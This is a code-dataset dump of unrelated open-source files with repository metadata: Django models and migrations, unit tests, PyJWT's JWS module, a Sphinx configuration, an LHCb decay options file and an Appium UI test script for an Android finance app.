{"beacon_module": "ps"},
]
}
beacon = salt.beacons.Beacon(mock_opts, [])
ret = beacon.process(mock_opts["beacons"], mock_opts["grains"])
_expected = [
{
"tag": "salt/beacon/minion/watch_apache/",
"data": {"id": "minion", "apache2": "Stopped"},
"beacon_name": "ps",
}
]
assert ret == _expected
# Ensure that "beacon_name" is available in the call to the beacon function
name = "ps.beacon"
mocked = {name: MagicMock(return_value=_expected)}
mocked[name].__globals__ = {}
calls = [
call(
[
{"processes": {"apache2": "stopped"}},
{"beacon_module": "ps"},
{"_beacon_name": "watch_apache"},
]
)
]
with patch.object(beacon, "beacons", mocked) as patched:
beacon.process(mock_opts["beacons"], mock_opts["grains"])
patched[name].assert_has_calls(calls)
| [
"mwilhite@vmware.com"
] | mwilhite@vmware.com |
d3cf863162bbc543d350c11218e6b2157ca672c3 | 23759c9e64e6ce82f4d7472b1f9c027b2d34bdad | /01 - News App(Unfinished)/webapp/main/migrations/0004_auto_20200809_0023.py | 50b59513ae34d90868220ea3c96f81de63aa7d3f | [] | no_license | TanimSk/Django-Archive | 77ce5912da5108ff5fd7d95d4e66d1961a3a5bb9 | 69710877df284a85f7b66e9ddb14b8bbb3c90eef | refs/heads/master | 2023-01-29T15:08:41.478146 | 2020-12-05T09:14:41 | 2020-12-05T09:14:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | # Generated by Django 3.1 on 2020-08-08 18:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20200807_1810'),
]
operations = [
migrations.AddField(
model_name='main_start',
name='facebook',
field=models.TextField(default='-'),
),
migrations.AddField(
model_name='main_start',
name='github',
field=models.TextField(default='-'),
),
migrations.AddField(
model_name='main_start',
name='youtube',
field=models.TextField(default='-'),
),
]
| [
"61817579+baseplate-admin@users.noreply.github.com"
] | 61817579+baseplate-admin@users.noreply.github.com |
9ea3047f9eafa6f106e1402425b14554e09a4be8 | 962fb0927fd2dc998f17a59809b0a508bb043ec0 | /tests/test_app.py | 0351d91848f829e2d4c0cab03b15c6faffbc6b66 | [
"MIT"
] | permissive | mozillazg/tinyq | 9653680c20e00cf973df68cd1c7224a5d8380dcf | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | refs/heads/master | 2023-08-23T21:18:37.207385 | 2017-06-19T14:03:06 | 2017-06-19T14:03:06 | 72,210,812 | 14 | 2 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | # -*- coding: utf-8 -*-
def test_app_delay(app):
@app.task()
def count(x, y):
return x + y
count.delay(1, 2)
assert len(app.schedule_queue.connection.keys('*')) == 1
assert app.schedule_queue.dequeue()
def test_app_call(app):
@app.task()
def count(x, y):
return x + y
assert count(1, 2) == 3
assert len(app.schedule_queue.connection.keys('*')) == 0
| [
"mozillazg101@gmail.com"
] | mozillazg101@gmail.com |
67569ed3a331217728b35b752ffc10ee42b26f69 | 7394e662a54b5df7307dc0f7a0a7d4ef4d1c045f | /event/models.py | 582a91fee88950db874c607e4109f7b03de98e24 | [] | no_license | Aman563/spectrum-server | a16660c043d7c98a80cf94296e9535cab50e9297 | f41cc13735f1e3a79f22be380bb9ed55489bed03 | refs/heads/master | 2020-04-21T20:58:33.367627 | 2018-01-23T14:34:24 | 2018-01-23T14:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
from register.models import UserData
class EventData(models.Model):
name = models.CharField(max_length=120, blank=True, null=True)
round_name = models.CharField(max_length=120, blank=True, null=True)
# rules = models.CharField(max_length=800, blank=True, null=True)
image = models.ImageField(upload_to='event/', default="/media/event/default.png")
image_blur = models.ImageField(upload_to='event/', default="/media/event/default.png")
image_landscape = models.ImageField(upload_to='event/', default="/media/event/default.png")
time = models.CharField(max_length=120, blank=True, null=True)
date = models.CharField(max_length=255, blank=True, null=True)
type = models.IntegerField(default=1, blank=True, null=True)
location = models.CharField(max_length=120, blank=True, null=True)
day = models.IntegerField(default=0, blank=True, null=True)
attendees = models.IntegerField(default=0, blank=True, null=True)
# description = models.CharField(max_length=800, blank=True, null=True)
prize_description = models.CharField(max_length=120, blank=True, null=True)
round = models.IntegerField(default=1, blank=True, null=True)
facebook_url = models.CharField(max_length=255, blank=True, null=True)
rules = models.TextField(max_length=1000, null=True, blank=True, default="")
description = models.TextField(max_length=1000, null=True, blank=True, default="")
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.name
class UserEventData(models.Model):
user = models.ForeignKey(UserData, null=True)
event = models.ForeignKey(EventData, null=True)
participated = models.IntegerField(default=0, blank=True, null=True)
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.user.name
class OrganiserData(models.Model):
name = models.CharField(max_length=120, blank=True, null=True)
mobile = models.CharField(max_length=120, blank=True, null=True)
event = models.ForeignKey(EventData, null=True)
modified = models.DateTimeField(auto_now=True, auto_now_add=False)
created = models.DateTimeField(auto_now=False, auto_now_add=True)
def __unicode__(self):
return self.name
| [
"ujjwal.iitism@gmail.com"
] | ujjwal.iitism@gmail.com |
ddfc0ba313bcc76af69e40d2021eb67ef443f3b8 | f3f616801184633a40d767c7f71b3e375fd166d1 | /hackerearth/events/june_circuits/set-2/little_boruto_and_rail_ways/test.py | d1209cc7da862a3d413d6c58a2469cbd1232519c | [
"MIT"
] | permissive | amarish-kumar/coding-challenges | cf0668114929c4cccd92944c1b8cb9c6e029ab9d | d5f998c738058d06a0217fb54f9f03a646384bce | refs/heads/master | 2020-03-21T10:26:08.919197 | 2017-05-20T13:58:50 | 2017-05-20T13:58:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | from unittest import TestCase, main as ut_main
import solution as sol
class TestSolution(TestCase):
def test_detect_disjoint_graph(self):
n = 3
edges = [[1, 2], [2, 3]]
graph, nodes = self.make_graph_and_node_list(n, edges)
self.assertEqual(self.start1(sol.detect_disjoint_graph(nodes, graph, n)), [1, 2, 3])
def make_graph_and_node_list(self, n, edges):
graph = sol.make_graph_from_edges(n, edges)
nodes = map(lambda i : i, range(0, n))
return graph, nodes
def start1(self, nodes):
return map(lambda i : i + 1, nodes)
def test_get_all_disjoint_graphs(self):
def test(n, edges, result):
graph, _ = self.make_graph_and_node_list(n, edges)
graphs = map(self.start1, sol.get_all_disjoint_graphs(graph, n))
self.assertEqual(graphs, result)
test(3, [[1, 2]], [[1, 2], [3]])
test(3, [[1, 2], [2, 3]], [[1, 2, 3]])
test(5, [[1, 2], [2, 3]], [[1, 2, 3], [4], [5]])
test(5, [[1, 2], [2, 3], [4, 5]], [[1, 2, 3], [4, 5]])
test(5, [], map(lambda i : [i], range(1, 6)))
if __name__ == '__main__':
ut_main()
| [
"babaiscool@gmail.com"
] | babaiscool@gmail.com |
523cecdfdf690e90f4c33ca6a4f3482ee0066c0b | 6d4c5e79bb36785d5bb127e263aac50cb6729a88 | /venv/Lib/site-packages/jwt/api_jws.py | 5accb1b50077b0d06551fb01ff2c4efebc8b14cc | [] | no_license | Galymbekov/BackWebDevProject | a7683fc205d467629f4ad132370ff4b5ac535277 | 3343fd277bc8994bec3d484072a8ed5f1d99b6bb | refs/heads/main | 2023-04-14T14:06:13.888793 | 2021-04-30T12:12:37 | 2021-04-30T12:12:37 | 362,004,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,095 | py | import binascii
import json
import warnings
try:
# import required by mypy to perform type checking, not used for normal execution
from typing import Callable, Dict, List, Optional, Union # NOQA
except ImportError:
pass
from .algorithms import (
Algorithm, get_default_algorithms, has_crypto, requires_cryptography # NOQA
)
from .compat import Mapping, binary_type, string_types, text_type
from .exceptions import (
DecodeError, InvalidAlgorithmError, InvalidSignatureError,
InvalidTokenError
)
from .utils import base64url_decode, base64url_encode, force_bytes, merge_dict
class PyJWS(object):
header_typ = 'JWT'
def __init__(self, algorithms=None, options=None):
self._algorithms = get_default_algorithms()
self._valid_algs = (set(algorithms) if algorithms is not None
else set(self._algorithms))
# Remove algorithms that aren't on the whitelist
for key in list(self._algorithms.keys()):
if key not in self._valid_algs:
del self._algorithms[key]
if not options:
options = {}
self.options = merge_dict(self._get_default_options(), options)
@staticmethod
def _get_default_options():
return {
'verify_signature': True
}
def register_algorithm(self, alg_id, alg_obj):
"""
Registers a new Algorithm for use when creating and verifying tokens.
"""
if alg_id in self._algorithms:
raise ValueError('Algorithm already has a handler.')
if not isinstance(alg_obj, Algorithm):
raise TypeError('Object is not of type `Algorithm`')
self._algorithms[alg_id] = alg_obj
self._valid_algs.add(alg_id)
def unregister_algorithm(self, alg_id):
"""
Unregisters an Algorithm for use when creating and verifying tokens
Throws KeyError if algorithm is not registered.
"""
if alg_id not in self._algorithms:
raise KeyError('The specified algorithm could not be removed'
' because it is not registered.')
del self._algorithms[alg_id]
self._valid_algs.remove(alg_id)
def get_algorithms(self):
"""
Returns a list of supported values for the 'alg' parameter.
"""
return list(self._valid_algs)
def encode(self,
payload, # type: Union[Dict, bytes]
key, # type: str
algorithm='HS256', # type: str
headers=None, # type: Optional[Dict]
json_encoder=None # type: Optional[Callable]
):
segments = []
if algorithm is None:
algorithm = 'none'
if algorithm not in self._valid_algs:
pass
# Header
header = {'typ': self.header_typ, 'alg': algorithm}
if headers:
self._validate_headers(headers)
header.update(headers)
json_header = force_bytes(
json.dumps(
header,
separators=(',', ':'),
cls=json_encoder
)
)
segments.append(base64url_encode(json_header))
segments.append(base64url_encode(payload))
# Segments
signing_input = b'.'.join(segments)
try:
alg_obj = self._algorithms[algorithm]
key = alg_obj.prepare_key(key)
signature = alg_obj.sign(signing_input, key)
except KeyError:
if not has_crypto and algorithm in requires_cryptography:
raise NotImplementedError(
"Algorithm '%s' could not be found. Do you have cryptography "
"installed?" % algorithm
)
else:
raise NotImplementedError('Algorithm not supported')
segments.append(base64url_encode(signature))
return b'.'.join(segments)
def decode(self,
jwt, # type: str
key='', # type: str
verify=True, # type: bool
algorithms=None, # type: List[str]
options=None, # type: Dict
**kwargs):
merged_options = merge_dict(self.options, options)
verify_signature = merged_options['verify_signature']
if verify_signature and not algorithms:
warnings.warn(
'It is strongly recommended that you pass in a ' +
'value for the "algorithms" argument when calling decode(). ' +
'This argument will be mandatory in a future version.',
DeprecationWarning
)
payload, signing_input, header, signature = self._load(jwt)
if not verify:
warnings.warn('The verify parameter is deprecated. '
'Please use verify_signature in options instead.',
DeprecationWarning, stacklevel=2)
elif verify_signature:
self._verify_signature(payload, signing_input, header, signature,
key, algorithms)
return payload
def get_unverified_header(self, jwt):
"""Returns shop the JWT header parameters as a dict()
Note: The signature is not verified so the header parameters
should not be fully trusted until signature verification is complete
"""
headers = self._load(jwt)[2]
self._validate_headers(headers)
return headers
def _load(self, jwt):
if isinstance(jwt, text_type):
jwt = jwt.encode('utf-8')
if not issubclass(type(jwt), binary_type):
raise DecodeError("Invalid token type. Token must be a {0}".format(
binary_type))
try:
signing_input, crypto_segment = jwt.rsplit(b'.', 1)
header_segment, payload_segment = signing_input.split(b'.', 1)
except ValueError:
raise DecodeError('Not enough segments')
try:
header_data = base64url_decode(header_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid header padding')
try:
header = json.loads(header_data.decode('utf-8'))
except ValueError as e:
raise DecodeError('Invalid header string: %s' % e)
if not isinstance(header, Mapping):
raise DecodeError('Invalid header string: must be a json object')
try:
payload = base64url_decode(payload_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid payload padding')
try:
signature = base64url_decode(crypto_segment)
except (TypeError, binascii.Error):
raise DecodeError('Invalid crypto padding')
return (payload, signing_input, header, signature)
def _verify_signature(self, payload, signing_input, header, signature,
key='', algorithms=None):
alg = header.get('alg')
if algorithms is not None and alg not in algorithms:
raise InvalidAlgorithmError('The specified alg value is not allowed')
try:
alg_obj = self._algorithms[alg]
key = alg_obj.prepare_key(key)
if not alg_obj.verify(signing_input, key, signature):
raise InvalidSignatureError('Signature verification failed')
except KeyError:
raise InvalidAlgorithmError('Algorithm not supported')
def _validate_headers(self, headers):
if 'kid' in headers:
self._validate_kid(headers['kid'])
def _validate_kid(self, kid):
if not isinstance(kid, string_types):
raise InvalidTokenError('Key ID header parameter must be a string')
_jws_global_obj = PyJWS()
encode = _jws_global_obj.encode
decode = _jws_global_obj.decode
register_algorithm = _jws_global_obj.register_algorithm
unregister_algorithm = _jws_global_obj.unregister_algorithm
get_unverified_header = _jws_global_obj.get_unverified_header
| [
"47265977+Galymbekov@users.noreply.github.com"
] | 47265977+Galymbekov@users.noreply.github.com |
eb6cddd566669ce91d865ba2e42ef6b5cef7277d | 517a904955033092aec11288151d725548226abc | /pandas_tutorial/data_io/to_json.py | a0ffb8e0237c8dd06a3f62e4a2bca9ba237e9763 | [] | no_license | MinSu-Kim/python_tutorial | ae0a4e3570aa4cb411626cefbc031777364764d5 | ed0c08892822d7054161c9e8f98841370868e82d | refs/heads/master | 2021-06-16T16:15:30.349719 | 2021-05-26T04:59:47 | 2021-05-26T04:59:47 | 207,266,202 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 511 | py | import pandas as pd
# 판다스 DataFrame() 함수로 데이터프레임 변환. 변수 df에 저장
data = {'name': ['Jerry', 'Riah', 'Paul'],
'algol': ["A", "A+", "B"],
'basic': ["C", "B", "B+"],
'c++': ["B+", "C", "C+"],
}
df = pd.DataFrame(data)
df.set_index('name', inplace=True) # name 열을 인덱스로 지정
print(df)
print("# to_json() 메소드를 사용하여 JSON 파일로 내보내기. 파열명은 df_sample.json로 저장")
df.to_json("./df_sample.json")
| [
"net94.teacher@gmail.com"
] | net94.teacher@gmail.com |
fa10145e9aa1763d721507e88caccee956b9b069 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_snag.py | 346b4d7003fc041b6b0c9bffbf125482ebf69e9b | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
#calss header
class _SNAG():
def __init__(self,):
self.name = "SNAG"
self.definitions = [u'a problem, difficulty, or disadvantage: ', u'a tear, hole, or loose thread in a piece of clothing or cloth caused by a sharp or rough object: ', u'informal for sausage ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
992ef5c5a51c47b4863fce8bcfdfbd2c973bb95d | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r9/Gen/DecFiles/options/14103050.py | 600b4f3f3becc10dbe313d0fbf4ba87e67483ba9 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r9/Gen/DecFiles/options/14103050.py generated: Fri, 27 Mar 2015 16:10:10
#
# Event Type: 14103050
#
# ASCII decay Descriptor: [B_c+ -> (B0 -> K+ K-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 14103050
Generation().SampleGenerationTool = "Special"
from Configurables import Special
Generation().addTool( Special )
Generation().Special.ProductionTool = "BcVegPyProduction"
Generation().PileUpTool = "FixedLuminosityForRareProcess"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bc_Bdpi+,KK=BcVegPy,DecProdCut.dec"
Generation().Special.CutTool = "BcDaughtersInLHCb"
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
1626fb780031dc410b6a61f8a143c903187cca5f | 3922e9b41bf8bf5dd0a0d9abc8852d147a02db0f | /articles/build/lib.linux-i686-2.7/migrations/0007_article_details_time.py | 9db06b6092089d394cf6015df2b0f59025538157 | [] | no_license | levi-p/market | 3ddd0ca20818139c96fa102256f21249d85f104f | 5deb8dbf83ddeb07415bd21703b57f3c3d54aa54 | refs/heads/master | 2020-07-10T18:03:30.316598 | 2017-01-20T15:00:39 | 2017-01-20T15:00:39 | 67,126,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 517 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-08-22 16:14
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0006_auto_20160808_1530'),
]
operations = [
migrations.AddField(
model_name='article_details',
name='time',
field=models.DateField(default=datetime.datetime(2016, 8, 22, 16, 14, 20, 530291)),
),
]
| [
"levipda@gmail.com"
] | levipda@gmail.com |
386e9f87de2b8a14c1f22d2e81b9b26ff7240681 | e76fda1fba459456c4bc105e7a6dcc6277a1a26c | /a_bite_of_python/20-keyword_only.py | e71eba82c6f9c7dd4676247a610cbae522e006aa | [] | no_license | lafabo/i-love-tutorials | 6bb2a684a201975ab523d9721b02761a6269853c | eafcd47fd62e770107c7e1f08e0d6d60a539f1ec | refs/heads/master | 2021-01-21T04:46:56.365199 | 2016-07-20T17:38:03 | 2016-07-20T17:38:03 | 47,709,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | def total(initial=5, *numbers, extra_number):
count = initial
for number in numbers:
count += number
count += extra_number
print(count)
total(10, 1, 2, 3, extra_number=50)
total(10, 1, 2 ,3)
| [
"lazyfatboy@ya.ru"
] | lazyfatboy@ya.ru |
528f2d2fd54dc7fe09e75f50c0c94d71c27c51db | 505f1c36d931d4388a0a4f8c57fbd8bd9ab4d821 | /ImageAnalysis/ImageAnalysis/python/docs/conf.py | 4bd685e97dd796c81348cf542b1c3ba2c06100fd | [
"MIT"
] | permissive | mikebourbeauart/perler-printer | 9e43a51b82cb9b08d35c81e680ea7ef2624fda2e | 8c5023de6bb9b3cbe2bc28c1c823030dfd708db4 | refs/heads/master | 2022-12-01T18:46:37.632443 | 2020-05-04T00:41:11 | 2020-05-04T00:41:11 | 98,070,537 | 0 | 1 | MIT | 2022-11-22T05:58:34 | 2017-07-23T02:49:35 | Python | UTF-8 | Python | false | false | 5,452 | py | # -*- coding: utf-8 -*-
#
# Perler Printer documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 09 14:05:44 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
#sys.path.insert(0, os.path.abspath('../source'))
#sys.path.insert(0, os.path.abspath('../source/arduino-comms'))
#sys.path.insert(0, os.path.abspath('../source/image-parsing'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Perler Printer'
copyright = u'2017, Mike Bourbeau'
author = u'Mike Bourbeau'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
'donate.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PerlerPrinterdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PerlerPrinter.tex', u'Perler Printer Documentation',
u'Mike Bourbeau', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'perlerprinter', u'Perler Printer Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PerlerPrinter', u'Perler Printer Documentation',
author, 'PerlerPrinter', 'One line description of project.',
'Miscellaneous'),
]
| [
"borbs727@gmail.com"
] | borbs727@gmail.com |
c0ca7088e2f0c17f756d8e622ffba7be75a25e7d | a2e673ba5797c242af20821075d76e84113d9503 | /Capitulo 2/Capitulo2-Decisoes.py | f55b8678aac544b2a5f1b22568957305bbdef20a | [] | no_license | Elvis-Lopes/Python-Fiap | ac0a09f44c67b9106a607b7e8082ce0248000316 | 1c10015155f84c8ddee5c8dbd7b21712741e1d1c | refs/heads/master | 2023-06-02T04:37:54.723196 | 2021-06-23T20:37:56 | 2021-06-23T20:37:56 | 377,885,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | nome = input("Digite o nome: ")
idade = int(input("Digite a idade: "))
prioridade = "Não"
if idade >= 65:
prioridade = "Sim"
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}')
else:
print(f'paciente: {nome}\n'
f'Idade: {idade} anos\n'
f'Prioridade: {prioridade}') | [
"elvislopes1996@hotmail.com"
] | elvislopes1996@hotmail.com |
8823445b94c9ad0e843e1f5cf51ff814a3180a57 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/amme/testcase/firstcases/testcase6_025.py | 874c6af813752507bf19190adc33729e91e453ef | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,763 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'com.money.manager.ex',
'appActivity' : 'com.money.manager.ex.home.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'com.money.manager.ex/com.money.manager.ex.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
    # Run `cmd` through the shell, give it `timeout` seconds, then terminate
    # it unconditionally.  Output is piped (stdout+stderr merged) and
    # discarded; nothing is returned.
    p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
    time.sleep(timeout)
    p.terminate()
    return
def getElememt(driver, str):
    """Locate an element by UiAutomator selector, polling up to 5 times.

    Sleeps one second between failed attempts; once the retries are
    exhausted, taps (50, 50) to wake the screen and performs a final
    lookup, which may raise NoSuchElementException.
    """
    for _ in range(5):
        try:
            return driver.find_element_by_android_uiautomator(str)
        except NoSuchElementException:
            time.sleep(1)
    os.popen("adb shell input tap 50 50")
    return driver.find_element_by_android_uiautomator(str)
def getElememtBack(driver, str1, str2):
    """Locate an element by primary selector `str1` (2 attempts), falling
    back to `str2` (5 attempts), sleeping 1s between failures.

    As a last resort, taps (50, 50) to wake the screen and retries `str2`
    once more (which may raise NoSuchElementException).
    """
    for selector, attempts in ((str1, 2), (str2, 5)):
        for _ in range(attempts):
            try:
                return driver.find_element_by_android_uiautomator(selector)
            except NoSuchElementException:
                time.sleep(1)
    os.popen("adb shell input tap 50 50")
    return driver.find_element_by_android_uiautomator(str2)
def swipe(driver, startxper, startyper, endxper, endyper):
    """Swipe between two points given as fractions of the window size.

    Retries once after a 1-second pause if the first attempt raises
    WebDriverException.
    """
    size = driver.get_window_size()
    width, height = size["width"], size["height"]
    # Build the argument set once; both attempts use identical coordinates.
    gesture = dict(start_x=int(width * startxper),
                   start_y=int(height * startyper),
                   end_x=int(width * endxper),
                   end_y=int(height * endyper),
                   duration=2000)
    try:
        driver.swipe(**gesture)
    except WebDriverException:
        time.sleep(1)
        driver.swipe(**gesture)
    return
# testcase025
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememtBack(driver, "new UiSelector().text(\"$ 0.00\")", "new UiSelector().className(\"android.widget.TextView\").instance(7)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menu_period\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/radio\").className(\"android.widget.RadioButton\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionFilters\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/menuTransactionStatusSelector\").className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/checkbox\").className(\"android.widget.CheckBox\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().className(\"android.widget.ImageButton\").description(\"Open\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"com.money.manager.ex:id/fab\").className(\"android.widget.ImageButton\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Donate\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(4)
driver.press_keycode(4)
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"test\")", "new UiSelector().className(\"android.widget.TextView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"6_025\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'com.money.manager.ex'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
